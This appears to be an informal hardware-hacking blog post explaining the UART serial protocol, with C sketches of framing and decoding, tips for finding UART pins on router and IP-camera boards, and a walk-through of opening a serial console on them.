TL;DR</h3>
<br />
<ul style="text-align: left;">
<li>UART exists! It stands for Universal Asynchronous Receiver-Transmitter</li>
<li>It usually exposes 3 or 4 pins: Ground (GND), Transmit (TX), Receive (RX) and Power (Vcc)</li>
<li>The pins on a board are usually close together, in line and grouped together (<i>especially if the PCB factory uses automated testing on the ports</i>)</li>
<li>It's a serial protocol, which means bits are signaled one after the other</li>
<li>Generally used for debugging; implementations often grant root access.</li>
<li>To drop a shell (sub-TL;DR): </li>
<ul>
<li>Hook up the UART signals to a USB friendly connector</li>
<li>Open a serial console</li>
</ul>
</ul>
<h3 style="text-align: left;">
What is UART? </h3>
<br />
Well, let's start with the name: Universal Asynchronous Receiver-Transmitter. The Asynchronous part means that the protocol doesn't carry an external clock signal to synchronize communication to, i.e. one bit transfer per clock edge, per clock cycle, every 36000 clock cycles, or any other "computable" function f(clock_cycles) hehe. Instead, both ends agree on a bit rate (the baud rate) ahead of time, and each side times the bits with its own local clock.<br />
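To put some numbers on that agreed bit rate, here's a tiny C sketch of the timing arithmetic. It assumes the common 8N1 framing (1 start bit, 8 data bits, no parity, 1 stop bit, so 10 bit periods per byte); the function names are made up for illustration. At 115200 baud one bit lasts 1/115200 s, roughly 8.68 µs, which caps throughput at 11520 bytes per second.

```c
/* Duration of one bit period in microseconds at a given baud rate. */
double uart_bit_time_us(long baud)
{
    return 1e6 / (double)baud;
}

/* Maximum payload bytes per second with 8N1 framing:
 * every byte costs 10 bit periods (start + 8 data + stop). */
double uart_bytes_per_sec_8n1(long baud)
{
    return (double)baud / 10.0;
}
```

Both sides only need to be close enough to each other's rate that the sampling point doesn't drift out of a bit period over one short frame, which is why UART gets away without a shared clock.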
<br />
<b>A clock signal</b><i>, if you're not familiar, is something that offers a regular fluctuation of signal (whatever your signal is made of, rats or electrostatic force). Why does this help computation? Why do you need a clock? Clocks are there for many reasons, most of the important ones being mathematical and theoretical (I erased my rant about successor functions and primitive recursion many times, but you can check out more here </i><a href="https://plato.stanford.edu/entries/computability/">https://plato.stanford.edu/entries/computability/</a> ).<i> </i><br />
<i>Anyway, they allow us to distinguish something's place in a "set" (whatever your set is made of: bits in a byte, memory addresses in a kernel pool, button presses in a time frame etc.), to prove that something happened at a given time, and to synchronize actions between different modules or computing things. Clocks are pretty much always there; the only real difference is whether they are inferred from other aspects of the context, either through the rate at which data is flip-flopped out of the chip (the maximum number of times the signal state is allowed to change), or supplied as a literal external signal.</i><br />
<br />
<br />
Anyway, UART could be a bit of a strange place to start if you're not used to the hardware stuff (<i>which I'm not entirely used to yet either!</i>), so I thought I'd come in on a softer landing and talk about communication protocols in general.<br />
<br />
Communication can happen in some of the following ways :<br />
<br />
<ul style="text-align: left;">
<li>On a single wire, one bit sequentially following the other - Serial</li>
<li>Multiple wires each signalling a bit at the same time - Parallel</li>
<li>Signalling based on the difference between signals - Differential </li>
<li>more things exist probably...</li>
</ul>
<br />
UART is on the serial side of things ("I'm super serial you guys" - E. Cartman): each bit is physically signaled down the wire one after the other. It's important to know this because it affects how you interact with the device and sample from it. This orientation of bit signalling shapes how you navigate the errors and pitfalls when interacting with it, again because you need to line up the bits against a clock to argue that they were received correctly. For instance, if it were parallel and you didn't have all your signals hooked up, you'd read garbage lol. As another example, if you're reading serial stuff and you aren't making good contact ALL THE TIME, or your device doesn't sample fast enough, you might see a broken clock and not be able to interpret the data correctly. So knowing what the orientation of the bit stream is gonna be is pretty crucial. Anyway, on with the UART!<br />
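To make "one bit after the other" concrete, here's a minimal C sketch of how a standard 8N1 frame lays a single byte out on the wire. It assumes the usual conventions: the line idles high, the start bit is low, data goes out least significant bit first, and the stop bit is high. <span style="font-family: courier;">uart_frame_8n1</span> and <span style="font-family: courier;">print_frame</span> are hypothetical helpers, not from any library.

```c
#include <stdint.h>
#include <stdio.h>

/* Number of bit periods in one 8N1 frame: start + 8 data + stop. */
#define UART_FRAME_BITS 10

/*
 * Hypothetical helper: serialize one byte into the sequence of line levels
 * an 8N1 UART transmitter would drive, one entry per bit period.
 * Assumes an idle-high line, low start bit, LSB-first data, high stop bit.
 */
void uart_frame_8n1(uint8_t byte, uint8_t bits[UART_FRAME_BITS])
{
    bits[0] = 0;                        /* start bit: line pulled low */
    for (int i = 0; i < 8; i++)
        bits[1 + i] = (byte >> i) & 1u; /* data bits, least significant first */
    bits[9] = 1;                        /* stop bit: back to idle high */
}

/* Print a frame as a string of 0/1 levels, handy to compare with a trace. */
void print_frame(const uint8_t bits[UART_FRAME_BITS])
{
    for (int i = 0; i < UART_FRAME_BITS; i++)
        putchar(bits[i] ? '1' : '0');
    putchar('\n');
}
```

For example, 'A' (0x41) comes out as 0100000101: the start bit, then 1,0,0,0,0,0,1,0 for the data (LSB first), then the stop bit.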
<br />
UART comes in many variants; there are modifications that cater to faster data transfer, error correction, parity bit states, etc. In this post I'm going to show what a stock standard UART looks like for a random embedded device I've been torturing lately. Before we get into the pins and signals, let's look at a simple state machine for the protocol (<i>because after all, even if you're engineering hardware, the computer scientists are still frigging amazing at math</i>). The FSMs for UART I'm going to show are for RX (the Receive signal, which accepts data for the UART host) and TX (the Transmit signal, which sends data from the UART host).<br />
<br />
State Machine for RX:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0-Z7GjvEbsn_Cj16wHjD3FqsfdQvUGd-5V5lOLzOuccE3w3Cr0-htpzphQYgOL27PlXjdKBEM5EqUdpXWLBDgDWL6OYLMddi_x4xQlQiNCigUf-m7f6yFhEiCpNZg7vU1mvnFFhAr-cI/s1600/RX_FSM.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="584" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0-Z7GjvEbsn_Cj16wHjD3FqsfdQvUGd-5V5lOLzOuccE3w3Cr0-htpzphQYgOL27PlXjdKBEM5EqUdpXWLBDgDWL6OYLMddi_x4xQlQiNCigUf-m7f6yFhEiCpNZg7vU1mvnFFhAr-cI/s400/RX_FSM.PNG" width="400" /></a></div>
<br />
Just to provide some clarity on my weird notation: <span style="font-family: "courier new" , "courier" , monospace;">1,0[8]</span> means that the state will loop 8 times gobbling up the bits (either 1 or 0). In this example the bits are being "gobbled" as they are signaled in through RX. Also the "e" means that you don't need any input to transition to this state; some real implementations of UART have states like this, usually to reset the data buffers and counters so they can catch more data when it's time.<br />
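Here's a rough C sketch of an RX state machine along those lines, written as a plain switch statement: wait in idle for the start bit, loop 8 times gobbling data bits, check the stop bit, then reset and go back to idle. It's an idealization and an assumption on my part, not the exact FSM in the diagram: it takes one sample per bit period, whereas real receivers oversample (often 16x) and sample near the middle of each bit. <span style="font-family: courier;">uart_rx_decode</span> is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>

/* States of a simplified 8N1 receiver. */
enum rx_state { RX_IDLE, RX_DATA, RX_STOP };

/*
 * Hypothetical decoder: walks line levels sampled once per bit period and
 * writes each correctly framed byte into out[]. Returns the number of bytes
 * decoded; frames whose stop bit is low (framing errors) are dropped.
 */
size_t uart_rx_decode(const uint8_t *levels, size_t n,
                      uint8_t *out, size_t out_cap)
{
    enum rx_state state = RX_IDLE;
    uint8_t shift = 0;   /* byte being assembled */
    int bit_count = 0;   /* data bits gobbled so far */
    size_t produced = 0;

    for (size_t i = 0; i < n; i++) {
        uint8_t level = levels[i] ? 1 : 0;
        switch (state) {
        case RX_IDLE:
            /* The line idles high; a low level is the start bit. */
            if (level == 0) {
                shift = 0;       /* the "e" step: reset buffer and counter */
                bit_count = 0;
                state = RX_DATA;
            }
            break;
        case RX_DATA:
            /* The 1,0[8] loop: gobble 8 data bits, LSB first. */
            shift |= (uint8_t)(level << bit_count);
            if (++bit_count == 8)
                state = RX_STOP;
            break;
        case RX_STOP:
            /* A valid stop bit is high; anything else is a framing error. */
            if (level == 1 && produced < out_cap)
                out[produced++] = shift;
            state = RX_IDLE;
            break;
        }
    }
    return produced;
}
```

Feeding it two idle bits followed by the frames for 'A' and 'B' should give back those two bytes.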
<br />
The state machine for TX looks exactly the same! It just says "TX" instead of "RX" hehe. But anyway, if you know how to implement state machines in Verilog this helps a ton (<i>there's an example linked later on</i>). This matters because when re-creating this kind of knowledge during reverse engineering, you'll run across many different types of FSMs describing complex protocols; check out this example from Lattice ( <a href="https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466">https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466</a> ):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s1600/PARITY.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s1600/PARITY.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="484" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s320/PARITY.PNG" width="317" /></a></div>
<br />
Surprisingly simple, no? I think this is a good place to start with wire/hardware protocols; as far as I've looked, the other ones can be seen as different modes and orientations of some of the tricks UART uses.<br />
<br />
For instance, you can add some states to the FSM: accept 8 bits in one state before going into TX, and you have a whole bunch of different instructions, or addresses to store stuff or do stuff. From this simple FSM you can build something like a JTAG or SPI interface by simply adding states, and adding states is not a massive mental operation once you've got the previous idea. These simple extensions give you a ton of computational Joo Joo!<br />
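A small, concrete case of "adding a state" is the optional parity bit that many UART configurations insert between the last data bit and the stop bit (8E1 means 8 data bits, even parity, 1 stop bit). The C sketch below assumes even parity; the helper names are hypothetical. Even parity is chosen so that the data bits plus the parity bit always contain an even number of 1s.

```c
#include <stdint.h>

/* Bit periods in an 8E1 frame: start + 8 data + parity + stop. */
#define UART_8E1_BITS 11

/* Even parity bit: 1 if the byte has an odd number of 1 bits, so that
 * data + parity together always carry an even number of 1s. */
uint8_t uart_even_parity(uint8_t byte)
{
    uint8_t p = 0;
    for (int i = 0; i < 8; i++)
        p ^= (byte >> i) & 1u;
    return p;
}

/* Hypothetical helper: 8N1 framing plus one extra state, the parity bit. */
void uart_frame_8e1(uint8_t byte, uint8_t bits[UART_8E1_BITS])
{
    bits[0] = 0;                          /* start bit */
    for (int i = 0; i < 8; i++)
        bits[1 + i] = (byte >> i) & 1u;   /* data bits, LSB first */
    bits[9] = uart_even_parity(byte);     /* the added parity state */
    bits[10] = 1;                         /* stop bit */
}
```

On the receive side the mirror image is one more FSM state that recomputes the parity and flags an error on mismatch.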
<br />
An awesome example can be found here <a href="https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html">https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html</a> - it comes in VHDL and Verilog!<br />
<br />
It's just a simple case statement with extra steps, not that big a deal! The tricky part is finding the friggin ports on the board.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRhNIWAqnzt8vzkWPgMcPZKiwfQMwSq_fsBjyuN3lQV6TDC-3hIvWGYUsxXHz2Jvem9dAZxcSEB-KqEiFMH3L0zf7-1IfNQi4c-ziE0Jw45S0EDyRT1RSF7U08VuxL4r2cSc1ee7pRQU/s1600/uart_2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="503" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRhNIWAqnzt8vzkWPgMcPZKiwfQMwSq_fsBjyuN3lQV6TDC-3hIvWGYUsxXHz2Jvem9dAZxcSEB-KqEiFMH3L0zf7-1IfNQi4c-ziE0Jw45S0EDyRT1RSF7U08VuxL4r2cSc1ee7pRQU/s400/uart_2.PNG" width="380" /></a></td></tr>
<tr><td class="tr-caption"><span style="font-size: x-small;">This UART port dropped a root shell :) No U-Boot foolery needed. As you can see, 3 lines are coming off the board even though there are 4 pins on the PCB. This is because one of the pins on the board was the UART Vcc, which I don't need to use for anything because the module is already powered by the board's power supply.</span><br />
<div style="font-size: 12.8px;">
<br /></div>
</td></tr>
</tbody></table>
<h3 style="text-align: left;">
UART Pins/Signals</h3>
<br />
UART pinouts can be as bare-bones as they come: ground (obviously), one signal for receiving, one for transmitting and maybe one for the "power in" Vcc.<br />
<br />
<br />
<ul style="text-align: left;">
<li><b>RX</b> - Receive; each bit period a bit is gobbled up by the device (your "host" TX should be connected to this port)</li>
<li><b>TX</b> - Transmit; each bit period a bit is pushed out by the device through this port (your "host" RX should be connected to this port)</li>
<li><b>Vcc</b> - Power input. Usually, if your UART module is mounted to a board, you probably don't want to feed this any input; you may overpower the device sometimes!</li>
<li><b>GND</b> - Ground, a very important pin: if you don't know where this one is, don't connect anything to the port. </li>
</ul>
<div>
<br /></div>
Other UART standards may have many other signals if they're fancy and want to signal when data starts being transferred (<i>to blink LEDs or signal other modules to do stuff</i>), so sometimes you might see UART standards with specifications for "RX Data Ready" or "TX Transfer Done" and other transfer metadata.<br />
<br />
The most important signals, of course, are RX, TX and GND; you can usually get by with just these. So let's look at what some UART interfaces look like on real devices. Here are a few examples of UART ports to work from:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5CLhMIPyYMG2HRLxtEE7sTE5JWbz9mVx29o5ECS3j1tF0Pg9CZfIm3kAI80pHVxUXGDSByha0oMvBoCTzSREFsrsou-j91lHnJ4KlZ4KsGS9F_9NiKBvFHNFKaV1aWn1Ou-UHWNaLVo/s1600/Screenshot+from+2019-05-09+11-41-33.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="365" data-original-width="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5CLhMIPyYMG2HRLxtEE7sTE5JWbz9mVx29o5ECS3j1tF0Pg9CZfIm3kAI80pHVxUXGDSByha0oMvBoCTzSREFsrsou-j91lHnJ4KlZ4KsGS9F_9NiKBvFHNFKaV1aWn1Ou-UHWNaLVo/s1600/Screenshot+from+2019-05-09+11-41-33.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">A straightforward UART giveaway: we can clearly see the GND, TX and RX pins labelled on the silkscreen. The pin that is not labelled is likely Vcc; it's probably left unlabelled precisely because the testing equipment doesn't use it during certain checks. </span></td></tr>
</tbody></table>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-nYX5phM0ZX_hY7_FfKQwshBQ_X2Mi12GaqElS65ferP1UyGx0HAqC-hFA5Brk2ylDODELHYEVZdab3S7ivx-Hthn9_dve7-YjohlUD-jUIUs1H0GrwD-_GwisLjMcv9A_Y0-Bo-Zhqk/s1600/Screenshot+from+2019-07-06+14-11-00.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="559" data-original-width="641" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-nYX5phM0ZX_hY7_FfKQwshBQ_X2Mi12GaqElS65ferP1UyGx0HAqC-hFA5Brk2ylDODELHYEVZdab3S7ivx-Hthn9_dve7-YjohlUD-jUIUs1H0GrwD-_GwisLjMcv9A_Y0-Bo-Zhqk/s1600/Screenshot+from+2019-07-06+14-11-00.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;">Example of a UART port on an IP camera PCB</span></div>
<span id="goog_482312293"></span><span id="goog_482312294"></span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJGF9HPqQz7Hfn_yHVsYPHT6OQLXViD91jSDalAh1eYdcFi67PLi1giwYHU3jA8lr1UkROdbJd1o3WyBYS59hbP79ZfjoyiE7J8QbRP4KXCHQqNuHN41d4dwRWtgbSdywpaXdC5jLJS4I/s1600/Screenshot+from+2019-07-06+14-11-11.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="494" data-original-width="473" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJGF9HPqQz7Hfn_yHVsYPHT6OQLXViD91jSDalAh1eYdcFi67PLi1giwYHU3jA8lr1UkROdbJd1o3WyBYS59hbP79ZfjoyiE7J8QbRP4KXCHQqNuHN41d4dwRWtgbSdywpaXdC5jLJS4I/s320/Screenshot+from+2019-07-06+14-11-11.png" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Probing out the Ground pin on a PCB for an IP camera.</span></td></tr>
</tbody></table>
<br />
<br />
<h3 style="text-align: left;">
Finding UART Ports</h3>
<br />
Hunting down UART ports is usually pretty easy. Manufacturers tend to <i>want</i> them to be easily identifiable, because either a machine on the assembly line or a human is supposed to find them, and either way they're not going to make anyone play Where's Wally to find the debug port. UARTs are typically a straight line of 3, 4 or more pins. <i>Other typical behavior I've seen: they tend to sit in a very easy to see / reach place, like the edge of the board, or near a SoC or other external connectors. </i><br />
<br />
The process for identifying these ports typically goes through the following phases.<br />
<br />
<h3 style="text-align: left;">
Methods for locating the ports/pins</h3>
The fastest method is to use the <b>data sheet</b> (<i>my RTFM moment is finally here</i>) for your device. As a first step, assume there's a data sheet for literally everything (<i>avoid reverse engineering stuff you don't need to</i>), and only once you are all Google'd out and there's no data sheet anywhere in the whole world wide weeb network, start playing with the electronics lol.<br />
<div>
<br />
<b>Find the ground signal</b>. If you don't have a ground signal strongly identified (<i>by strongly I mean it is very probably the right, definite ground plane lol</i>), interacting with the UART safely is usually very hard to do. <i>I like identifying the ground first because it means I can hook up all my toys without having them explode</i>!<br />
<ol style="text-align: left;">
<ul>
<li><b>Continuity test between an obvious ground and the suspected one</b> (<i>many PCBs have exposed metal around USB ports, power inlets etc. that will usually be grounded</i>). To double check that you have the right ground, I suggest finding the ground of the power or other ports as well and checking that there is continuity between that obvious ground and your UART ground. </li>
</ul>
</ol>
If you have other pins near this one, measure the voltage between each of them and your ground, making sure the numbers make sense (they should be around 3-5 Volts; anything massively higher is highly strange).</div>
<div>
<br />
If you have identified another SoC or chip on the board and you have the data sheet for it, see if you can find out whether:<br />
<ol style="text-align: left;">
<ul>
<li>It has TX or RX pins (or MOSI / MISO; any serial pins would be huge clues!), and see if this gives you more context on the possible UART port you're looking for. <i>After all, the system on chip usually needs to dump its debug data somewhere, so it should be talking to the UART somehow, right? That could mean there's continuity between some pins!</i></li>
</ul>
</ol>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBg7T2bOToqLLS6L7-9j2eXvzfcwCpGLF_QfTuLJXgIvvpn6ZaDhej8ZiH4YSz9O3fA_IuX86v1rCw1mX7p6SqQ6VAoJEMGKJwoKFEihdx0dmpuyPZd3Jknp8M0WrFe89eNYfzpF8nDhI/s1600/uart_1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="311" data-original-width="536" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBg7T2bOToqLLS6L7-9j2eXvzfcwCpGLF_QfTuLJXgIvvpn6ZaDhej8ZiH4YSz9O3fA_IuX86v1rCw1mX7p6SqQ6VAoJEMGKJwoKFEihdx0dmpuyPZd3Jknp8M0WrFe89eNYfzpF8nDhI/s400/uart_1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption"><span style="font-size: x-small;">Easy to see which one is ground. This is from a stock standard router I plucked off Amazon. The two signals other than ground are, you guessed it, RX and TX.</span><br />
<div style="font-size: 12.8px;">
<br /></div>
</td></tr>
</tbody></table>
</div>
<h3 style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
Interacting with the ports (logic tracing)</h3>
<div>
<b>Hook up a logic analyzer</b> to it (<i>you don't always need a Saleae or however you spell it; some cheapo $20 ones do the job just fine sometimes!</i>). <i>Make sure your logic analyzer is grounded, of course! And that the ground is common to the supposed UART! </i></div>
<div>
<i><br /></i></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqeVhQB4PlJEj5M5r0-Vlyh5Ud1fa59iqMOyPDkSkkLk4zJq9GEY-5ryRXumeNWd9nPP_zLmHPPktydLAnmrF5gan9wQtFDd6NgZ1FIQL6FFFX7YOn3McWzEhNWo6VL955w4fM_giBZw/s1600/uart_logic.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="949" data-original-width="921" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqeVhQB4PlJEj5M5r0-Vlyh5Ud1fa59iqMOyPDkSkkLk4zJq9GEY-5ryRXumeNWd9nPP_zLmHPPktydLAnmrF5gan9wQtFDd6NgZ1FIQL6FFFX7YOn3McWzEhNWo6VL955w4fM_giBZw/s400/uart_logic.png" width="387" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Logic analyzing the UART on an IP camera board. I'm using a cheapo logic analyzer here; it barely samples above 25 MHz hehe, but it does the job sometimes!</span></td></tr>
</tbody></table>
<div>
<i><br /></i>Power the device and try to capture the period where you think most of the OS debug noise will happen. Sometimes it never stops and just keeps going, but you can't capture forever, and you don't need a huge capture to confirm a UART either, so think a bit about the device life cycle!</div>
<div>
<br />
Look for some signals that register the following characteristics:<br />
<ol style="text-align: left;"><ul>
<li><b>CLK</b> - usually this is a very regular square wave signal (check out some of the examples). UART itself has no clock line, so if you see one of these it belongs to something other than the UART.</li>
<li><b>GND</b> - just kidding you shouldn't be seeing this in your logic analyzer! Stay woke people!</li>
<li><b>RX</b> - if you're talking about RX from the board's perspective, this shouldn't be showing any activity; it should just be pulled high or stay constant at some level the whole time</li>
<li><b>TX</b> - this is where the action is. If you're looking at a typical UART TX signal, it should start showing some "OS boot-loadery" looking data, or just readable data of some kind. For a lot of embedded devices this results in a direct bootloader shell, so expect kernel, expect Linux, <i>expect us we are anonym-lol jk</i>. </li>
</ul>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu0syKB7P28lZyBN7lfFXduDOn94pVIgT3gsBbh5EZvu8gbMje2TuMJYaovrnm7On8_8RJ9Dlx4pGgWlg_KtPfwT6_Ud70tisn71uImZn6F4kSA4q5wIz-EB6xYA3fPjatQg3-V_9DQ1A/s1600/uart_logic_trace.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="246" data-original-width="1472" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu0syKB7P28lZyBN7lfFXduDOn94pVIgT3gsBbh5EZvu8gbMje2TuMJYaovrnm7On8_8RJ9Dlx4pGgWlg_KtPfwT6_Ud70tisn71uImZn6F4kSA4q5wIz-EB6xYA3fPjatQg3-V_9DQ1A/s640/uart_logic_trace.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Some UART traffic. You'll notice that every UART byte signaled down the line starts with a bit period (a first flop) that doesn't contribute to the set of bits that form the byte. That little flop at the beginning is the start bit: the line drops low from its idle-high level to signal the start of a frame. </span></td></tr>
</tbody></table>
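Once you have a capture of the TX line, you can usually guess the baud rate from it. The shortest run of identical samples is (most likely) one bit period, so dividing the analyzer's sample rate by that run length gives a raw bit rate, which you can snap to the nearest common baud. For a feel of the margins: a 24 MHz analyzer sees about 24,000,000 / 115,200 ≈ 208 samples per bit at 115200 baud. This is a sketch under assumptions: the capture is already reduced to 0/1 levels, it contains at least one isolated bit (true for most text), it is free of single-sample glitches, and the baud table is just a common subset. <span style="font-family: courier;">estimate_baud</span> is a hypothetical helper.

```c
#include <stddef.h>
#include <stdint.h>

/* Common UART baud rates to snap an estimate onto (not exhaustive). */
static const long std_bauds[] = {
    9600, 19200, 38400, 57600, 115200, 230400, 460800, 921600
};

/*
 * Hypothetical helper: estimate the baud rate of a captured TX line.
 * samples[] holds 0/1 levels taken at sample_rate_hz. Returns the closest
 * standard rate, or 0 if no complete run (edge to edge) was found.
 */
long estimate_baud(const uint8_t *samples, size_t n, double sample_rate_hz)
{
    size_t shortest = 0; /* shortest complete run so far, in samples */
    size_t run = 1;      /* length of the run currently being measured */
    int seen_edge = 0;   /* the first run may be cut off by the capture start */

    for (size_t i = 1; i < n; i++) {
        if (samples[i] == samples[i - 1]) {
            run++;
            continue;
        }
        /* An edge: the run that just ended is complete if it began at an edge. */
        if (seen_edge && (shortest == 0 || run < shortest))
            shortest = run;
        seen_edge = 1;
        run = 1;
    }
    if (shortest == 0)
        return 0;

    double raw = sample_rate_hz / (double)shortest; /* bit periods per second */
    long best = std_bauds[0];
    double best_err = -1.0;
    for (size_t i = 0; i < sizeof std_bauds / sizeof std_bauds[0]; i++) {
        double err = raw - (double)std_bauds[i];
        if (err < 0)
            err = -err;
        if (best_err < 0 || err < best_err) {
            best_err = err;
            best = std_bauds[i];
        }
    }
    return best;
}
```

If your capture is noisy, a simple fix is to ignore runs shorter than a few samples before taking the minimum; once you have a candidate rate, confirm it by decoding the capture at that rate and checking that you get readable text.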
</div>
<h3 style="text-align: left;">
Interacting with the ports (dumping a UART shell)</h3>
<div>
<ol style="text-align: left;"><ul>
</ul>
<li>Get some serial bytes onto your machine. There are various ways to do this; I'll briefly cover some methods that haven't failed me so far (in my limited experience):</li>
<ul>
<li><b>Bus Pirate</b> - I know it's essentially the script-kiddie version of nmap for hardware hackers, but to be honest it gets the job done and it's damn easy to use!</li>
<ul>
<li><a href="http://dangerousprototypes.com/blog/bus-pirate-manual/bus-pirate-uart-guide/">http://dangerousprototypes.com/blog/bus-pirate-manual/bus-pirate-uart-guide/</a></li>
<li><a href="https://haquesprojects.wordpress.com/embedded-device-hacking/using-a-bus-pirate-as-a-usb-ttl-serial-converter/">https://haquesprojects.wordpress.com/embedded-device-hacking/using-a-bus-pirate-as-a-usb-ttl-serial-converter/</a></li>
<li><a href="https://iotmyway.wordpress.com/2018/05/19/getting-the-router-shell-using-uart-interface-and-bus-pirate/">https://iotmyway.wordpress.com/2018/05/19/getting-the-router-shell-using-uart-interface-and-bus-pirate/</a></li>
</ul>
<li><b>FTDI Serial TTL-232 cable</b> - hook your port up to this and stick it straight into your machine; the FTDI chip on these gadgets takes care of all the gritty details involved in turning the RX / TX signals into a USB serial device that picocom can open on your machine. </li>
<ul>
<li><a href="https://www.adafruit.com/product/70">https://www.adafruit.com/product/70</a> </li>
</ul>
<li>FPGA - for the hardcore folks out there, you can probably hook the UART up to an FPGA and use it to forward the traffic to your machine over the FPGA's own UART.</li>
</ul>
<li>Open a serial port and suck out some bytes. Many tools exist for this, but it usually comes down to picocom (I use picocom a lot!), minicom or screen. Here are some simple tutorials for getting them going. </li>
<ul>
<li><a href="http://wiki.t-firefly.com/ROC-RK3328-CC/debug.html">http://wiki.t-firefly.com/ROC-RK3328-CC/debug.html</a></li>
<li><a href="https://developer.ridgerun.com/wiki/index.php/Setting_up_Picocom_-_Ubuntu">https://developer.ridgerun.com/wiki/index.php/Setting_up_Picocom_-_Ubuntu</a> </li>
<li>(serial programming in python!) <a href="https://elinux.org/Serial_port_programming">https://elinux.org/Serial_port_programming</a></li>
<li><a href="https://www.cyberciti.biz/hardware/5-linux-unix-commands-for-connecting-to-the-serial-console/">https://www.cyberciti.biz/hardware/5-linux-unix-commands-for-connecting-to-the-serial-console/</a> </li>
</ul>
</ol>
